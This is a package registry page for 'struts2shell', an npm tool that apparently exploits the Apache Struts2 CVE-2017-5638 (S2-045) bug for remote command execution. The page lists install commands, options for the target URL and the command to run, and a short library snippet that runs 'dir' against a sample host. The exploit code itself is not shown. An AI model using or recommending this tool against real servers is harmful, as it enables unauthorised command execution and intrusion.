Important: This documentation covers Yarn 1 (Classic).
For Yarn 2+ docs and migration guide, see yarnpkg.com.

Package detail

struts2shell

jpacora9MIT1.0.0

An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.

Struts, Hacking, Exploit

readme

Struts2Shell

An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.

Installation

$ npm install -g struts2shell

Installation as Library

$ npm install struts2shell

Command Line Options

-h, --help           output usage information
-V, --version        output the version number
-u, --url [target]   URL to Attack
-c, --cmd [command]  Command to Execute

Usage as Library

var Struts2Shell = require('struts2shell');
Struts2Shell({
    URL: 'http://example.com/some.action',
    CMD: 'dir'
}, function(err, response,body) {
    if(err) throw err;
    console.log(body)
})

Screenshot

Struts2Shell

License

MIT

Free Software, Hell Yeah!